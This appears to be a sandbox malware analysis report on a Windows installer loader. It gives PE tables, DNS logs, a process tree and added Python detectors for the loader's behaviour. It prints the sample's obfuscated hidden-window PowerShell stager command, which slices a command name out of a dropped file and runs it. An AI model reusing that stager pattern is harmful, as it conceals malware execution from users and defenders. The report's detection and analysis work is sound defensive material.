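    sections = []
    for i in range(nsections):
        fields = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        name, vsize, va, raw_size, raw_ptr = fields[:5]
        raw = data[raw_ptr:raw_ptr + raw_size]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": va,
            "virtual_size": vsize,
            "raw_size": raw_size,
            "entropy": shannon_entropy(raw),
            "characteristics": fields[9],
        })
    return {"machine": machine, "directories": directories, "sections": sections}


def check_certificate_table(data: bytes, directories: dict) -> dict:
    """Sanity-check IMAGE_DIRECTORY_ENTRY_SECURITY. Unlike the other entries its first
    field is a file offset, not an RVA; a well-formed Authenticode table sits at the
    very end of the file and starts with a WIN_CERTIFICATE header."""
    offset, size = directories.get("SECURITY", (0, 0))
    result = {"present": size > 0, "at_tail": False, "header_ok": False}
    if size == 0 or offset + 8 > len(data):
        return result
    result["at_tail"] = offset + size == len(data)
    length, revision, cert_type = struct.unpack_from("<IHH", data, offset)
    result["header_ok"] = (
        length <= size and revision in (0x0100, 0x0200) and cert_type == 0x0002  # PKCS#7 SignedData
    )
    return result


def analyze(data: bytes) -> dict:
    info = parse_pe(data)
    info["certificate"] = check_certificate_table(data, info["directories"])
    return info


def build_sample_pe() -> bytes:
    """Constructed input (not the real sample): a minimal PE32 with one .text section
    and a dummy certificate table appended, so the example runs offline."""
    text = bytes(range(256)) * 2            # 512 bytes, uniform -> entropy 8.0
    cert_blob = b"\xAA" * 16                # placeholder for the PKCS#7 blob
    win_cert = struct.pack("<IHH", 8 + len(cert_blob), 0x0200, 0x0002) + cert_blob
    cert_offset = 0x400                     # headers (0x200) + .text raw data (0x200)
    dirs = [(0, 0)] * 16
    dirs[SECURITY_INDEX] = (cert_offset, len(win_cert))
    opt = struct.pack("<HBBIIIIII", 0x10B, 6, 0, len(text), 0, 0, 0x1000, 0x1000, 0x2000)
    opt += struct.pack("<IIIHHHHHHIIIIHHIIIIII",
                       0x400000, 0x1000, 0x200, 4, 0, 0, 0, 4, 0, 0,
                       0x2000, 0x200, 0, 2, 0, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", va, sz) for va, sz in dirs)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, len(opt), 0x0102)
    section = struct.pack("<8sIIIIIIHHI", b".text", len(text), 0x1000, len(text), 0x200,
                          0, 0, 0, 0, 0x60000020)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)
    headers = (dos + b"PE\0\0" + coff + opt + section).ljust(0x200, b"\0")
    return headers + text + win_cert


if __name__ == "__main__":
    report = analyze(build_sample_pe())
    for sec in report["sections"]:
        print(f"{sec['name']:8} raw=0x{sec['raw_size']:x} entropy={sec['entropy']:.3f}")
    print("SECURITY:", report["directories"]["SECURITY"], report["certificate"])
```

Run stand-alone it prints the constructed section's entropy (8.0 for uniform bytes; the report's .text is 6.48, typical of compiled code rather than packed data) and the certificate check. Feed analyze() the real sample's bytes to get the same view as the tables; PE32+ images use different optional-header offsets and make the parser raise rather than return wrong numbers.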
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x503b8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 0 | English | United States | 0.11695551875073938
RT_ICON | 0x60be0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.22240663900414936
RT_ICON | 0x63188 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.29924953095684803
RT_ICON | 0x64230 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | United States | 0.23480810234541577
RT_ICON | 0x650d8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | United States | 0.23826714801444043
RT_ICON | 0x65980 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 0 | English | United States | 0.24390243902439024
RT_ICON | 0x65fe8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | United States | 0.25
RT_ICON | 0x66550 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.5567375886524822
RT_ICON | 0x669b8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | United States | 0.30510752688172044
RT_ICON | 0x66ca0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | United States | 0.5
RT_DIALOG | 0x66dc8 | 0x140 | data | English | United States | 0.471875
RT_DIALOG | 0x66f08 | 0x11c | data | English | United States | 0.6091549295774648
RT_DIALOG | 0x67028 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x670f0 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x67150 | 0x92 | data | English | United States | 0.6301369863013698
RT_VERSION | 0x671e8 | 0x25c | data | English | United States | 0.5198675496688742
RT_MANIFEST | 0x67448 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
DLL | Import
KERNEL32.dll | SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, CreateFileW, GetFileSize, MoveFileW, SetFileAttributesW, GetModuleFileNameW, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, WaitForSingleObject, GetCurrentProcess, CompareFileTime, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GetDiskFreeSpaceW, lstrlenW, lstrcpynW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll | GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll | RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName / Address | Type | Class | DNS over HTTPS
Jan 10, 2025 18:40:28.840118885 CET | 1.1.1.1 | 192.168.2.5 | 0xa487 | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 18:40:28.840118885 CET | 1.1.1.1 | 192.168.2.5 | 0xa487 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 84.201.210.38 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:40:28.840118885 CET | 1.1.1.1 | 192.168.2.5 | 0xa487 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 217.20.57.26 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:40:28.840118885 CET | 1.1.1.1 | 192.168.2.5 | 0xa487 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 217.20.57.42 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:40:28.840118885 CET | 1.1.1.1 | 192.168.2.5 | 0xa487 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 217.20.57.37 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:40:28.840118885 CET | 1.1.1.1 | 192.168.2.5 | 0xa487 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 217.20.57.43 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:40:28.840118885 CET | 1.1.1.1 | 192.168.2.5 | 0xa487 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 84.201.210.21 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:40:28.840118885 CET | 1.1.1.1 | 192.168.2.5 | 0xa487 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 217.20.57.23 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:40:28.840118885 CET | 1.1.1.1 | 192.168.2.5 | 0xa487 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 84.201.210.36 | A (IP address) | IN (0x0001) | false

Initial process chain (Start date 10/01/2025 for all; "Programmed in" is reported as "C, C++ or other language" for every process):

Target ID | Start time | Path | Commandline | Wow64 process (32bit) | Imagebase | File size | MD5 hash | Elevated / administrator privileges | Reputation | Has exited
0 | 12:40:11 | C:\Users\user\Desktop\Ej86aa7Ki7.exe | "C:\Users\user\Desktop\Ej86aa7Ki7.exe" | true | 0x400000 | 840'408 bytes | CC768B964D98FA2D0CF4D9089176C6B9 | true / true | low | true
2 | 12:40:12 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell.exe -windowstyle hidden "$Fysioterapiens=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Taarnvognenes.Ufe';$Blinn=$Fysioterapiens.SubString(29179,3);.$Blinn($Fysioterapiens) | true | 0x4b0000 | 433'152 bytes | C32CA4ACFCC635EC1EA6ED8A34DF5FAC | true / true | high | false
3 | 12:40:12 | C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | false | 0x7ff6d64d0000 | 862'208 bytes | 0D698AF330FD17BEE3BF90011D49251D | true / true | high | false
4 | 12:40:27 | C:\Windows\System32\SIHClient.exe | C:\Windows\System32\sihclient.exe /cv LjRh2CI4qEuakRNETXm55Q.0.2 | false | 0x7ff692c60000 | 380'720 bytes | 8BE47315BF30475EEECE8E39599E9273 | true / true | moderate | true
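The Target ID 2 command line above is a three-step indirection: read a dropped file as one string, cut three characters out of it at character offset 29179, and invoke whatever those characters name with the whole file as the argument, so the cmdlet that actually runs the second stage never appears on the command line or in the file's obvious strings. The following added example (my code, not from the report) recovers that cmdlet statically from a copy of the dropped file instead of executing anything, and doubles as a detector for command lines of this shape. Assumptions: the regexes cover only the gc/Get-Content -raw plus SubString plus .$var( pattern seen here, and build_sample_payload() is a constructed stand-in for Taarnvognenes.Ufe in which the three characters at offset 29179 spell iex; the real file's contents are not reproduced on this page.

```python
import re

# The stager command line recorded for Target ID 2, copied from the report.
STAGER_CMDLINE = (
    'powershell.exe -windowstyle hidden "$Fysioterapiens=gc -raw '
    "'C:\\Users\\user\\AppData\\Roaming\\afdragsordning\\Taarnvognenes.Ufe';"
    "$Blinn=$Fysioterapiens.SubString(29179,3);.$Blinn($Fysioterapiens)"
)

# Read the whole file into one string (gc is an alias of Get-Content).
READ_RAW_RE = re.compile(r"\b(?:gc|cat|type|Get-Content)\s+-raw\s+'([^']+)'", re.IGNORECASE)
# Cut a short slice out of that string: .SubString(offset, length)
SUBSTRING_RE = re.compile(r"\.SubString\(\s*(\d+)\s*,\s*(\d+)\s*\)", re.IGNORECASE)
# Invoke the slice as a command: .$var(...) or &$var(...)
INVOKE_VAR_RE = re.compile(r"[.&]\s*\$\w+\s*\(")


def parse_substring_stager(cmdline: str):
    """Return (path, offset, length) when the command line has the read-file,
    SubString, invoke-variable shape; otherwise None."""
    read = READ_RAW_RE.search(cmdline)
    sub = SUBSTRING_RE.search(cmdline)
    if not (read and sub and INVOKE_VAR_RE.search(cmdline)):
        return None
    return read.group(1), int(sub.group(1)), int(sub.group(2))


def resolve_hidden_command(file_bytes: bytes, offset: int, length: int,
                           encoding: str = "latin-1") -> str:
    """Reproduce $var.SubString(offset, length) without running PowerShell.
    Get-Content -raw yields text, so the offset counts characters of the decoded
    file, not bytes; latin-1 keeps the two equal and suits the constructed sample."""
    text = file_bytes.decode(encoding)
    if offset + length > len(text):
        raise ValueError("SubString would throw: file shorter than offset + length")
    return text[offset:offset + length]


def triage(cmdline: str, file_bytes: bytes) -> dict:
    """One-shot view an analyst wants: is this the pattern, and what does it call?"""
    parsed = parse_substring_stager(cmdline)
    if parsed is None:
        return {"stager": False}
    path, offset, length = parsed
    return {
        "stager": True,
        "path": path,
        "offset": offset,
        "length": length,
        "hidden_command": resolve_hidden_command(file_bytes, offset, length),
    }


def build_sample_payload() -> bytes:
    """Constructed stand-in for Taarnvognenes.Ufe (assumption: the three characters
    at offset 29179 spell iex; the real file is not shown on this page)."""
    filler = (b"$Decoy = 'filler';\r\n" * 2000)[:29179]      # exactly 29179 bytes
    return filler + b"iex" + b"\r\n# constructed second-stage body follows\r\n"


if __name__ == "__main__":
    print(triage(STAGER_CMDLINE, build_sample_payload()))
```

The offset is a character index into the string Get-Content produced, so decode the real file the way PowerShell would (honouring a BOM; otherwise Windows PowerShell 5.1 falls back to the system ANSI code page) before slicing, or non-ASCII bytes earlier in the file shift the result. Hunting on the pattern rather than on the variable names is what makes the detector survive the randomised Danish identifiers this family rotates.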

Child process batches. Common to every row: Start date 10/01/2025, Wow64 process (32bit) reported as false, elevated and administrator privileges true, Programmed in "C, C++ or other language", Has exited true, and a command line that is the bare quoted image path with no arguments.

Target IDs | Count | Start time | Path | Commandline | Imagebase | File size | MD5 hash | Reputation
6-11 | 6 | 12:41:28 | C:\Windows\SysWOW64\msiexec.exe | "C:\Windows\SysWOW64\msiexec.exe" | 0x7e0000 | 59'904 bytes | 9D09DC1EDA745A5F87553048E57620CF | high
12-15 | 4 | 12:41:28 | C:\Windows\SysWOW64\msiexec.exe | "C:\Windows\SysWOW64\msiexec.exe" | 0x7e0000 | 59'904 bytes | 9D09DC1EDA745A5F87553048E57620CF | not reported
16-26 | 11 | 12:41:28 | C:\Windows\SysWOW64\dxdiag.exe | "C:\Windows\SysWOW64\dxdiag.exe" | 0xe30000 | 222'720 bytes | 24D3F0DB6CCF0C341EA4F6B206DF2EDF | not reported
27-36 | 10 | 12:41:29 | C:\Windows\SysWOW64\msiexec.exe | "C:\Windows\SysWOW64\msiexec.exe" | 0x7e0000 | 59'904 bytes | 9D09DC1EDA745A5F87553048E57620CF | not reported
37-41 | 5 | 12:41:29 | C:\Windows\SysWOW64\dxdiag.exe | "C:\Windows\SysWOW64\dxdiag.exe" | 0xe30000 | 222'720 bytes | 24D3F0DB6CCF0C341EA4F6B206DF2EDF | not reported

Thirty-six argument-less copies of two system binaries start within a two-second window, more than a minute after powershell.exe, and all have exited by the end of the run. Note an inconsistency in the report: these rows say Wow64 process (32bit): false, yet the paths are under SysWOW64 and the image bases (0x7e0000, 0xe30000) are in the 32-bit range, so that field should not be relied on for these entries.
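The children in the table above share one footprint: many msiexec.exe and dxdiag.exe instances, every command line the bare image path, all started between 12:41:28 and 12:41:29. That is the pattern to hunt for in endpoint process-creation telemetry, and the following added example (my code, not the report's) does so over constructed events: group argument-less children by parent and image, count how many fall inside a sliding time window, and flag any parent that exceeds a threshold. Assumption: the report does not state the parent of these processes; the constructed events attribute them to the powershell.exe stage (PID 4796, taken from the process tree) and add one benign explorer-launched msiexec.exe with real arguments that must not be flagged.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed process-creation events modelled on the Target ID table above.
# Assumption: the parent of the msiexec.exe / dxdiag.exe batch is the powershell.exe
# stage (PID 4796); the report lists the children but not their parent PIDs.
MSIEXEC = r"C:\Windows\SysWOW64\msiexec.exe"
DXDIAG = r"C:\Windows\SysWOW64\dxdiag.exe"
T0 = datetime(2025, 1, 10, 12, 41, 28)


def _ev(seconds, pid, ppid, image, cmdline):
    return {"time": T0 + timedelta(seconds=seconds), "pid": pid, "ppid": ppid,
            "image": image, "cmdline": cmdline}


EVENTS = (
    [_ev(0, 5000 + i, 4796, MSIEXEC, f'"{MSIEXEC}"') for i in range(6)]
    + [_ev(0, 5100 + i, 4796, DXDIAG, f'"{DXDIAG}"') for i in range(3)]
    + [_ev(1, 5200 + i, 4796, MSIEXEC, f'"{MSIEXEC}"') for i in range(4)]
    # benign: explorer launching one msiexec with real arguments ten minutes later
    + [_ev(600, 6000, 1234, MSIEXEC, f'"{MSIEXEC}" /i C:\\Temp\\tool.msi /qn')]
)


def has_no_arguments(cmdline: str, image: str) -> bool:
    """True when the command line is just the (optionally quoted) image path."""
    return cmdline.strip().strip('"').lower() == image.lower()


def find_spawn_bursts(events, window=timedelta(seconds=5), min_children=3):
    """Flag (parent, image) pairs where one parent starts >= min_children copies of
    the same image with no arguments inside `window`: the footprint of a loader
    creating suspended host processes to hollow."""
    starts = defaultdict(list)
    for ev in events:
        if has_no_arguments(ev["cmdline"], ev["image"]):
            starts[(ev["ppid"], ev["image"])].append(ev["time"])
    hits = []
    for (ppid, image), times in starts.items():
        times.sort()
        best, j = 0, 0
        for i, t in enumerate(times):
            while t - times[j] > window:       # slide the window's left edge forward
                j += 1
            best = max(best, i - j + 1)
        if best >= min_children:
            hits.append({"ppid": ppid, "image": image, "children_in_window": best})
    return sorted(hits, key=lambda h: -h["children_in_window"])


if __name__ == "__main__":
    for hit in find_spawn_bursts(EVENTS):
        print(hit)
```

Tune window and min_children to the environment: installers legitimately start a few msiexec.exe instances with arguments, but a script host launching a dozen argument-less copies within two seconds has no benign explanation. Feeding Sysmon event ID 1 or an EDR's process-start stream into EVENTS is a matter of mapping the same five fields.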


        Execution Graph

        Execution Coverage:21.7%
        Dynamic/Decrypted Code Coverage:0%
        Signature Coverage:20.3%
        Total number of Nodes:1344
        Total number of Limit Nodes:29
        [Execution graph: interactive rendering of the 1344-node call graph, not reproduced as text. The nodes in the dump resolve to the stub's file, registry, shell and token APIs, among them GetFileAttributesW, SetCurrentDirectoryW, CreateDirectoryW, SetFileSecurityW, GetModuleHandleA / GetProcAddress / LoadLibraryExW, GetSystemDirectoryW, GetWindowsDirectoryW, GetTempPathW, SHGetSpecialFolderLocation / SHGetPathFromIDListW / CoTaskMemFree, RegOpenKeyExW / RegQueryValueExW / RegCloseKey, FindFirstFileW / FindNextFileW / FindClose, DeleteFileW, RemoveDirectoryW, SetFileAttributesW, MoveFileExW, GetShortPathNameW, CreateFileW / ReadFile / WriteFile / SetFilePointer, GlobalAlloc / GlobalFree, OleInitialize / CoUninitialize, SHGetFileInfoW, GetCommandLineW, SetEnvironmentVariableW, GetTickCount, GetModuleFileNameW, GetCurrentProcess / OpenProcessToken / LookupPrivilegeValueW / AdjustTokenPrivileges, ExitWindowsEx, ExitProcess and shell32 ordinal #17.]
3403->3542 3404->3373 3407 403800 3404->3407 3405->3404 3409 403805 3407->3409 3410 40380c 3407->3410 3412 405840 4 API calls 3409->3412 3414 4058bd 2 API calls 3410->3414 3411 403778 3532 406212 lstrcpynW 3411->3532 3415 40380a 3412->3415 3416 403811 SetCurrentDirectoryW 3414->3416 3415->3416 3417 403821 3416->3417 3418 40382c 3416->3418 3537 406212 lstrcpynW 3417->3537 3538 406212 lstrcpynW 3418->3538 3421 406234 18 API calls 3422 40386b DeleteFileW 3421->3422 3423 403878 CopyFileW 3422->3423 3429 40383a 3422->3429 3423->3429 3424 4038c1 3425 4060b3 38 API calls 3424->3425 3427 4038c8 3425->3427 3426 4060b3 38 API calls 3426->3429 3427->3373 3428 406234 18 API calls 3428->3429 3429->3421 3429->3424 3429->3426 3429->3428 3431 4038ac CloseHandle 3429->3431 3539 4058f2 CreateProcessW 3429->3539 3431->3429 3432->3356 3433->3358 3435 4064a6 5 API calls 3434->3435 3436 403425 3435->3436 3437 40342f 3436->3437 3438 405bc6 3 API calls 3436->3438 3437->3364 3439 403437 3438->3439 3440 4058bd 2 API calls 3439->3440 3441 40343d 3440->3441 3545 405e16 3441->3545 3549 405de7 GetFileAttributesW CreateFileW 3444->3549 3446 402f18 3473 402f25 3446->3473 3550 406212 lstrcpynW 3446->3550 3448 402f3b 3449 405c12 2 API calls 3448->3449 3450 402f41 3449->3450 3551 406212 lstrcpynW 3450->3551 3452 402f4c GetFileSize 3453 40304d 3452->3453 3471 402f63 3452->3471 3552 402e33 3453->3552 3457 403090 GlobalAlloc 3461 4030a7 3457->3461 3458 4030e8 3459 402e33 33 API calls 3458->3459 3459->3473 3465 405e16 2 API calls 3461->3465 3462 403071 3463 4033ec ReadFile 3462->3463 3466 40307c 3463->3466 3464 402e33 33 API calls 3464->3471 3467 4030b8 CreateFileW 3465->3467 3466->3457 3466->3473 3468 4030f2 3467->3468 3467->3473 3567 403402 SetFilePointer 3468->3567 3470 403100 3568 40317b 3470->3568 3471->3453 3471->3458 3471->3464 3471->3473 3583 4033ec 3471->3583 3473->3374 3475 4065ec 5 API calls 3474->3475 3476 403a6f 3475->3476 3477 403a75 3476->3477 3478 403a87 3476->3478 3631 406159 wsprintfW 
3477->3631 3479 4060df 3 API calls 3478->3479 3480 403ab7 3479->3480 3481 403ad6 lstrcatW 3480->3481 3484 4060df 3 API calls 3480->3484 3483 403a85 3481->3483 3615 403d31 3483->3615 3484->3481 3487 405cce 18 API calls 3488 403b08 3487->3488 3489 403b9c 3488->3489 3492 4060df 3 API calls 3488->3492 3490 405cce 18 API calls 3489->3490 3491 403ba2 3490->3491 3493 403bb2 LoadImageW 3491->3493 3495 406234 18 API calls 3491->3495 3494 403b3a 3492->3494 3496 403c58 3493->3496 3497 403bd9 RegisterClassW 3493->3497 3494->3489 3498 403b5b lstrlenW 3494->3498 3502 405bf3 CharNextW 3494->3502 3495->3493 3501 40140b 2 API calls 3496->3501 3499 403c62 3497->3499 3500 403c0f SystemParametersInfoW CreateWindowExW 3497->3500 3503 403b69 lstrcmpiW 3498->3503 3504 403b8f 3498->3504 3499->3392 3500->3496 3505 403c5e 3501->3505 3506 403b58 3502->3506 3503->3504 3507 403b79 GetFileAttributesW 3503->3507 3508 405bc6 3 API calls 3504->3508 3505->3499 3510 403d31 19 API calls 3505->3510 3506->3498 3509 403b85 3507->3509 3511 403b95 3508->3511 3509->3504 3512 405c12 2 API calls 3509->3512 3513 403c6f 3510->3513 3632 406212 lstrcpynW 3511->3632 3512->3504 3515 403c7b ShowWindow 3513->3515 3516 403cfe 3513->3516 3518 40657c 3 API calls 3515->3518 3624 405444 OleInitialize 3516->3624 3520 403c93 3518->3520 3519 403d04 3522 403d20 3519->3522 3523 403d08 3519->3523 3521 403ca1 GetClassInfoW 3520->3521 3524 40657c 3 API calls 3520->3524 3526 403cb5 GetClassInfoW RegisterClassW 3521->3526 3527 403ccb DialogBoxParamW 3521->3527 3525 40140b 2 API calls 3522->3525 3523->3499 3529 40140b 2 API calls 3523->3529 3524->3521 3525->3499 3526->3527 3528 40140b 2 API calls 3527->3528 3528->3499 3529->3499 3530->3377 3531->3411 3532->3378 3534 40596c 3533->3534 3535 4037bb ExitProcess 3534->3535 3536 405980 MessageBoxIndirectW 3534->3536 3536->3535 3537->3418 3538->3429 3540 405931 3539->3540 3541 405925 CloseHandle 3539->3541 3540->3429 3541->3540 3543 401389 2 API calls 3542->3543 3544 401420 3543->3544 
3544->3382 3546 405e23 GetTickCount GetTempFileNameW 3545->3546 3547 403448 3546->3547 3548 405e59 3546->3548 3547->3364 3548->3546 3548->3547 3549->3446 3550->3448 3551->3452 3553 402e44 3552->3553 3554 402e5c 3552->3554 3555 402e54 3553->3555 3556 402e4d DestroyWindow 3553->3556 3557 402e64 3554->3557 3558 402e6c GetTickCount 3554->3558 3555->3457 3555->3473 3586 403402 SetFilePointer 3555->3586 3556->3555 3587 406628 3557->3587 3558->3555 3560 402e7a 3558->3560 3561 402e82 3560->3561 3562 402eaf CreateDialogParamW ShowWindow 3560->3562 3561->3555 3591 402e17 3561->3591 3562->3555 3564 402e90 wsprintfW 3565 405371 25 API calls 3564->3565 3566 402ead 3565->3566 3566->3555 3567->3470 3569 4031a6 3568->3569 3570 40318a SetFilePointer 3568->3570 3594 403283 GetTickCount 3569->3594 3570->3569 3573 403243 3573->3473 3574 405e6a ReadFile 3575 4031c6 3574->3575 3575->3573 3576 403283 43 API calls 3575->3576 3577 4031dd 3576->3577 3577->3573 3578 403249 ReadFile 3577->3578 3580 4031ec 3577->3580 3578->3573 3580->3573 3581 405e6a ReadFile 3580->3581 3582 405e99 WriteFile 3580->3582 3581->3580 3582->3580 3584 405e6a ReadFile 3583->3584 3585 4033ff 3584->3585 3585->3471 3586->3462 3588 406645 PeekMessageW 3587->3588 3589 406655 3588->3589 3590 40663b DispatchMessageW 3588->3590 3589->3555 3590->3588 3592 402e26 3591->3592 3593 402e28 MulDiv 3591->3593 3592->3593 3593->3564 3595 4032b1 3594->3595 3596 4033db 3594->3596 3607 403402 SetFilePointer 3595->3607 3597 402e33 33 API calls 3596->3597 3604 4031ad 3597->3604 3599 4032bc SetFilePointer 3603 4032e1 3599->3603 3600 4033ec ReadFile 3600->3603 3602 402e33 33 API calls 3602->3603 3603->3600 3603->3602 3603->3604 3605 405e99 WriteFile 3603->3605 3606 4033bc SetFilePointer 3603->3606 3608 40672b 3603->3608 3604->3573 3604->3574 3605->3603 3606->3596 3607->3599 3609 406750 3608->3609 3610 406758 3608->3610 3609->3603 3610->3609 3611 4067e8 GlobalAlloc 3610->3611 3612 4067df GlobalFree 3610->3612 3613 406856 GlobalFree 3610->3613 
3614 40685f GlobalAlloc 3610->3614 3611->3609 3611->3610 3612->3611 3613->3614 3614->3609 3614->3610 3616 403d45 3615->3616 3633 406159 wsprintfW 3616->3633 3618 403db6 3619 406234 18 API calls 3618->3619 3620 403dc2 SetWindowTextW 3619->3620 3621 403ae6 3620->3621 3622 403dde 3620->3622 3621->3487 3622->3621 3623 406234 18 API calls 3622->3623 3623->3622 3634 404322 3624->3634 3626 40548e 3627 404322 SendMessageW 3626->3627 3629 4054a0 CoUninitialize 3627->3629 3628 405467 3628->3626 3637 401389 3628->3637 3629->3519 3631->3483 3632->3489 3633->3618 3635 40433a 3634->3635 3636 40432b SendMessageW 3634->3636 3635->3628 3636->3635 3639 401390 3637->3639 3638 4013fe 3638->3628 3639->3638 3640 4013cb MulDiv SendMessageW 3639->3640 3640->3639 3977 402a4b 3978 402c31 18 API calls 3977->3978 3979 402a51 3978->3979 3980 402a88 3979->3980 3982 4028a1 3979->3982 3983 402a63 3979->3983 3981 406234 18 API calls 3980->3981 3980->3982 3981->3982 3983->3982 3985 406159 wsprintfW 3983->3985 3985->3982 3989 4016cc 3990 402c53 18 API calls 3989->3990 3991 4016d2 GetFullPathNameW 3990->3991 3992 4016ec 3991->3992 3993 40170e 3991->3993 3992->3993 3996 406555 2 API calls 3992->3996 3994 401723 GetShortPathNameW 3993->3994 3995 402adb 3993->3995 3994->3995 3997 4016fe 3996->3997 3997->3993 3999 406212 lstrcpynW 3997->3999 3999->3993 4000 401b4d 4001 402c53 18 API calls 4000->4001 4002 401b54 4001->4002 4003 402c31 18 API calls 4002->4003 4004 401b5d wsprintfW 4003->4004 4005 402adb 4004->4005 4013 40234e 4014 402c53 18 API calls 4013->4014 4015 40235d 4014->4015 4016 402c53 18 API calls 4015->4016 4017 402366 4016->4017 4018 402c53 18 API calls 4017->4018 4019 402370 GetPrivateProfileStringW 4018->4019 4020 402851 4021 402859 4020->4021 4022 40285d FindNextFileW 4021->4022 4024 40286f 4021->4024 4023 4028b6 4022->4023 4022->4024 4026 406212 lstrcpynW 4023->4026 4026->4024 3819 401ed5 3820 402c53 18 API calls 3819->3820 3821 401edb 3820->3821 3822 405371 25 API calls 3821->3822 3823 
